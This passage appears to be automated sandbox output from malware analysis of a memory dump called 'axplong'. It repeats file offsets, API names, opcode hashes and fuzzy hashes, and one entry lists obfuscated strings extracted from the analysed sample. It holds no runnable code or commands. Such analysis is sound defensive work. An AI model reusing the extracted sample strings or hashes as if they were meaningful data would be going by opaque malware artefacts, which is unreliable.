                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          • Opcode ID: aca440e857c6cebf09a9bd830e587776c16fff0b42ef4628f017ea5af87a381f
                          • Instruction ID: 3e538124bf68dcb15c6326cec4e9fe4dedb5d6fc876beff9982c2d145ba2c337
                          • Opcode Fuzzy Hash: aca440e857c6cebf09a9bd830e587776c16fff0b42ef4628f017ea5af87a381f
                          • Instruction Fuzzy Hash: 05C26F71E246298FDF25CE28DD447E9B3B5EB89304F1441EAE84DE7240EB74AE958F40
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                          • Instruction ID: ce0c53afc379289a6b166eb6cdc01949730797f12c5ca01219e911f94f2694f7
                          • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                          • Instruction Fuzzy Hash: 26F15E71E1021ADFDF14CFA8C9806AEB7B1FF49314F15826AE819A7345DB30AE55CB90
                          APIs
                          • ___std_exception_copy.LIBVCRUNTIME ref: 0026247E
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___std_exception_copy
                          • String ID: 'k'd+,$'k'd+,
                          • API String ID: 2659868963-3091570108
                          • Opcode ID: 917bdcd12a324f4f98da42e939a1d8759953087d58d7cb620c6d9a311674a6d1
                          • Instruction ID: ccb59c036bb0fb67d12ba4efefaf243c14f3ed499cdaacda03ef922e5ecb9ed7
                          • Opcode Fuzzy Hash: 917bdcd12a324f4f98da42e939a1d8759953087d58d7cb620c6d9a311674a6d1
                          • Instruction Fuzzy Hash: 8E518DB2920606DFDB29CF55E885BAAB7F0FF58310F24856AD408EB250D774D950CF90
                          APIs
                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,0027CE82,?,?,?,?,0027CEB7,?,?,?,?,?,?,0027C42D,?,00000001), ref: 0027CB33
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$FilePreciseSystem
                          • String ID:
                          • API String ID: 1802150274-0
                          • Opcode ID: 855032916b4d152a1ed0ac9e025c70da84fa91f84aca543ec79071e843a6c9bb
                          • Instruction ID: a61eeef935571a7b175a354bed9e550315152d5a71112f03e5f1e444a3ddf123
                          • Opcode Fuzzy Hash: 855032916b4d152a1ed0ac9e025c70da84fa91f84aca543ec79071e843a6c9bb
                          • Instruction Fuzzy Hash: 3BD02232562138A3CA122BA1BC088ADBB1DCB01B183604215FD08232208BA0BC506BD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                          • Instruction ID: b724f3c7a0a01b2488a4baaf9970fb72e8069f89307f20e7ba4ec0549a8ee404
                          • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                          • Instruction Fuzzy Hash: F8518A7023C64A56DF388E3888967BE679A9F52300F1804AED4C2D7A82DB51DD74C761
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e732a4c5c11db6e0f1568f36b8086667a6fad47d995b2e1a14d1ee85571c4e6
                          • Instruction ID: 2ae20414854b2502fa6e15125677f090b2c26e44e328441c6a1375f126fb4b69
                          • Opcode Fuzzy Hash: 7e732a4c5c11db6e0f1568f36b8086667a6fad47d995b2e1a14d1ee85571c4e6
                          • Instruction Fuzzy Hash: 1C225FB3F515144BDB4CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158A44
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 79bc32aaa14bb18bf8b88e5a776211f2f2e196aab9f344e494f444b3fcbbecab
                          • Instruction ID: 52a8e791de7a82cac1975058e0ace52c612efb0d42c59a0ddc1b9a829e223e03
                          • Opcode Fuzzy Hash: 79bc32aaa14bb18bf8b88e5a776211f2f2e196aab9f344e494f444b3fcbbecab
                          • Instruction Fuzzy Hash: C7B17031224605DFD714CF28C886B657BE0FF46364F258658E8D9CF2A1CB75E9A1CB44
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f0c9c4f8a78694f65250f25cb624d08e4c03735635e09a717ed3d66db51cce7b
                          • Instruction ID: c420b35cf75ee9713ca7e194299079c3a80abc20ee6b1cf22838a1eca98eacce
                          • Opcode Fuzzy Hash: f0c9c4f8a78694f65250f25cb624d08e4c03735635e09a717ed3d66db51cce7b
                          • Instruction Fuzzy Hash: DE51B1706187D18FC319CF2D851563ABBE5AF95300F484A9EE0DA87292D774DA84CB92
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 028e9ba5a7dfa204238625c5221f391da61adb7e497df2d55f80c9576fb19ee3
                          • Instruction ID: 1ceb7502b68dd90f76642d5297faa17dcabb8db2d51a0feba012144f8a3fca5d
                          • Opcode Fuzzy Hash: 028e9ba5a7dfa204238625c5221f391da61adb7e497df2d55f80c9576fb19ee3
                          • Instruction Fuzzy Hash: 6721B673F204394B770CC47E8C5727DB6E1C68C641745423AE8A6EA2C1D96CD917E2E4
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bca478f0211aec6be83fd45aac3cc98212318f7afd439f27c6a8750fcb31154f
                          • Instruction ID: 981486c4f6ca66f03ab7e18383f16c629dc81e10943a18b05bd0b74b106b5850
                          • Opcode Fuzzy Hash: bca478f0211aec6be83fd45aac3cc98212318f7afd439f27c6a8750fcb31154f
                          • Instruction Fuzzy Hash: 3C118A23F30C255B675C817D8C172BAA5D6DBD825071F533AD826EB384E994DE23D290
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction ID: 535c16cd2d5143197c668350b24ecfc2f77d0f3f6da48b6e4f4fd1dab8d68156
                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction Fuzzy Hash: BE11087F22014387D605CE2DCDF8AB6E796EAC7321B3C437AD1424B758DE229965D900
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 53b8a5831ee7bfbc421d4f0d823ba6c786e0f084101bfa19a5bc70530d17cd87
                          • Instruction ID: f4c94418ada08c181d1439350fc389d04df81a6ab569751200a3d571bdc39a66
                          • Opcode Fuzzy Hash: 53b8a5831ee7bfbc421d4f0d823ba6c786e0f084101bfa19a5bc70530d17cd87
                          • Instruction Fuzzy Hash: B8E08C30161A486FDF357F55CC19A4C3BAAEB01344F006801FC0886222CB35ECE1D980
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                          • Instruction ID: 5053c50f94d750bb1c1e3c081c6c85a37f9d5706f0a9dd0de330138a34242646
                          • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                          • Instruction Fuzzy Hash: 00E04632921228EBCB15DB88890498AF2ACEB48B00F254096B505D3240C2B0DF00CBD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                          • API String ID: 0-2390467879
                          • Opcode ID: 2e1359996050e3c48d21e3e8de08770626286a2b2364b1646dac5e105f3ccb24
                          • Instruction ID: ee4cd17ccec1370c3b9ec0cea42798354d9b7e9f52ed67f378aedabdf422bcaa
                          • Opcode Fuzzy Hash: 2e1359996050e3c48d21e3e8de08770626286a2b2364b1646dac5e105f3ccb24
                          • Instruction Fuzzy Hash: CC02E571920248DFEF14EFA8CC59BDE7BB5EF05304F508158E809A7282D7759A94CFA2
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
